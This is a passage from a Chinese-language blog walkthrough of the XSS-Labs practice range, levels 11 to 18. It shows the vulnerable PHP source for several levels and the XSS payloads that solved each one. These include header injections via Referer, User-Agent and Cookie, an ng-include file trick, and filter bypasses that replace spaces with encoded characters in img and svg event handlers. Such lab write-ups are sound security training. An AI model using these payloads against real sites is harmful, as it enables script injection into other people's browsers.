stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531111654078.png"  alt="image-20260531111654078"></p>
<p>成功触发</p>
<h3 id="level11"><a href="#level11" class="headerlink" title="level11"></a>level11</h3><p>源码：</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601171009101.png"  alt="image-20260601171009101"></p>
<p>存在4个隐藏参数，进行测试：</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601171448674.png"  alt="image-20260601171448674"></p>
<p>只有两个参数会插入到html源码中</p>
<p>继续尝试</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?keyword=&lt;script&gt;alert(11)&lt;/script&gt;&amp;t_sort=&quot; onfocus=javascript:alert() &quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601193243903.png"  alt="image-20260601193243903"></p>
<p>后端，对引号和标签都进行了实体化</p>
<p>多出来一个参数：t_ref,是通过referer这个http传送的。</p>
<p>使用burpsuite进行过抓包，修改Referer请求头:</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Referer: &quot;  type=&quot;text&quot; onfocus=javascript:alert(111) &quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601202717473.png"  alt="image-20260601202717473"></p>
<p>成功触发</p>
<h3 id="level12"><a href="#level12" class="headerlink" title="level12"></a>level12</h3><p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601203021941.png"  alt="image-20260601203021941"></p>
<p>Useragent请求头会被加载到页面中，在此处尝试：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">User-Agent: &quot;  type=&quot;text&quot; onfocus=javascript:alert(111) &quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601203512946.png"  alt="image-20260601203512946"></p>
<p>点击输入框成功触发xss</p>
<h3 id="level13"><a href="#level13" class="headerlink" title="level13"></a>level13</h3><p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601203752581.png"  alt="image-20260601203752581"></p>
<p>这关应该是cookie可以进行xss</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie: user=&quot;  type=&quot;text&quot; onfocus=javascript:alert(111) &quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601204021342.png"  alt="image-20260601204021342"></p>
<h3 id="level14"><a href="#level14" class="headerlink" title="level14"></a>level14</h3><p>卧槽，这关刺激啊</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601204633238.png"  alt="image-20260601204633238"></p>
<p>emm，pass</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601210032441.png"  alt="image-20260601210032441"></p>
<h3 id="level15"><a href="#level15" class="headerlink" title="level15"></a>level15</h3><p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601211111452.png"  alt="image-20260601211111452"></p>
<p>代码审计：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = $_GET[&quot;src&quot;];</span><br><span class="line">echo &#x27;&lt;body&gt;&lt;span class=&quot;ng-include:&#x27;.htmlspecialchars($str).&#x27;&quot;&gt;&lt;/span&gt;&lt;/body&gt;&#x27;;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601211835465.png"  alt="image-20260601211835465"></p>
<p><code>htmlspecialchars($str)</code>：会把双引号 <code>&quot;</code>、单引号 <code>&#39;</code>、大于号 <code>&gt;</code>、小于号 <code>&lt;</code> 全都转义成 HTML 实体（比如 <code>&lt;</code> 变成 <code>&amp;lt;</code>）。</p>
<p>向scr进行传参，包含一个文件，文件内容可触发alert弹窗(本地测试)</p>
<p>1.html文件内容：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta http-equiv=&quot;content-type&quot; content=&quot;text/html;charset=utf-8&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;title&gt;测试&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;img src=&quot;1&quot; onerror=&quot;window.alert(111)&quot;&gt;</span><br><span class="line">&lt;h1 align=center&gt;测试&lt;/h1&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>文件保存在靶场网站目录下</p>
<p>访问：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?src=&#x27;1.html&#x27;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601213624512.png"  alt="image-20260601213624512"></p>
<p>成功触发xss</p>
<h3 id="level16"><a href="#level16" class="headerlink" title="level16"></a>level16</h3><div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">level16.php?keyword=&lt;script&gt;alert(11)&lt;/script&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601214223389.png"  alt="image-20260601214223389"></p>
<p><code>&amp;nbsp;</code>是空格的html实体化格式</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = strtolower($_GET[&quot;keyword&quot;]);</span><br><span class="line">$str2=str_replace(&quot;script&quot;,&quot;&amp;nbsp;&quot;,$str);</span><br><span class="line">$str3=str_replace(&quot; &quot;,&quot;&amp;nbsp;&quot;,$str2);</span><br><span class="line">$str4=str_replace(&quot;/&quot;,&quot;&amp;nbsp;&quot;,$str3);</span><br><span class="line">$str5=str_replace(&quot;	&quot;,&quot;&amp;nbsp;&quot;,$str4);</span><br><span class="line">echo &quot;&lt;center&gt;&quot;.$str5.&quot;&lt;/center&gt;&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>后端将script,空格和斜杠都替换成了<code>&amp;nbsp;</code></p>
<p>使用其他标签，空格绕过：</p>
<div class="table-container"><table>
<thead>
<tr>
<th><strong>字符</strong></th>
<th><strong>URL 编码</strong></th>
<th><strong>说明</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>Tab 键</strong></td>
<td><code>%09</code></td>
<td>水平制表符</td>
</tr>
<tr>
<td><strong>换行符</strong></td>
<td><code>%0a</code></td>
<td>Line Feed (LF)</td>
</tr>
<tr>
<td><strong>垂直 Tab</strong></td>
<td><code>%0b</code></td>
<td>Vertical Tab (极少被过滤)</td>
</tr>
<tr>
<td><strong>换页符</strong></td>
<td><code>%0c</code></td>
<td>Form Feed (FF)</td>
</tr>
<tr>
<td><strong>回车符</strong></td>
<td><code>%0d</code></td>
<td>Carriage Return (CR)</td>
</tr>
</tbody></table></div>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;img%0asrc=1%0aonerror=alert(1)&gt;</span><br><span class="line">&lt;svg%0conload=alert(1)&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><code>SVG，可缩放矢量图形（Scalable Vector Graphics），是一种用于描述二维图形的 XML 标记语言。</code></p>
<img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260601220256693.png"  alt="image-20260601220256693" style="zoom: 50%;" >

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260601215650644.png"  alt="image-20260601215650644"></p>
<h3 id="level17"><a href="#level17" class="headerlink" title="level17"></a>level17</h3><div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?arg01=111111&amp;arg02=111111</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260602091645669.png"  alt="image-20260602091645669"></p>
<p><strong><code>&lt;embed&gt;</code> 元素</strong>将外部内容嵌入文档中的指定位置。此内容由外部应用程序或其他交互式内容源（如浏览器插件）提供。</p>
<p><code>&lt;embed&gt; </code>标签支持 <a target="_blank" rel="noopener" href="https://www.runoob.com/tags/ref-eventattributes.html">HTML 的事件属性</a>。</p>
<p>在参数arg02进行拼接：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?arg01=a&amp;arg02=b onmousemove=&#x27;alert(1)&#x27;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>成功触发xss</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260602093723822.png"  alt="image-20260602093723822"></p>
<h3 id="level18"><a href="#level18" class="headerlink" title="level18"></a>level18</h3><p>与第17关通理</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?arg01=a&amp;arg02=b onmousemove=&#x27;alert(1)&#x27;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44556964/article/details/130325628?ops_request_misc=elastic_search_misc&request_id=7c07c14371621c6b4483d9286b855ba9&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~ElasticSearch~search_v2-1-130325628-null-null.nonecase&utm_term=xss&spm=1018.2226.3001.4450">实用性极强的XSS-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/L00kback/p/17552275.html">https://www.cnblogs.com/L00kback/p/17552275.html</a></p>
</div><div class="post-tail-tags"><a class="post-tail-tags-link" href="/tags/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/" rel="tag">靶场练习</a></div><div class="post-nav"><a class="post-nav-prev" href="/2026/06/14/JS%E9%80%86%E5%90%91%E4%B9%8B%E6%9F%90%E5%B9%B3%E5%8F%B0%E7%99%BB%E5%BD%95%E5%AF%86%E7%A0%81%E5%8A%A0%E5%AF%86/" title="JS逆向之某平台登录密码加密">Previous post<span>JS逆向之某平台登录密码加密</span></a><a class="post-nav-next" href="/2026/05/26/linux%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%B1%A1%E6%9F%93/" title="linux二进制污染">Next post<span>linux二进制污染</span></a></div></div><aside id="post-sidebar" status="show"><div id="toc-container"><div class="toc-title"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"><span>Table Of Content</span></div><div class="toc-content" id="toc-div"><ol class="toc-list"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#XSS%E7%AE%80%E8%BF%B0"><span class="toc-list-text">XSS简述</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#DOM%E7%AE%80%E8%BF%B0"><span class="toc-list-text">DOM简述</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level1"><span class="toc-list-text">level1</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level2"><span class="toc-list-text">level2</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level3"><span class="toc-list-text">level3</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level4"><span class="toc-list-text">level4</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level5"><span class="toc-list-text">level5</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level6"><span class="toc-list-text">level6</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level7"><span class="toc-list-text">level7</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level8"><span class="toc-list-text">level8</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level9"><span class="toc-list-text">level9</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level10"><span class="toc-list-text">level10</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level11"><span class="toc-list-text">level11</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level12"><span class="toc-list-text">level12</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level13"><span class="toc-list-text">level13</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level14"><span class="toc-list-text">level14</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#level15"><span 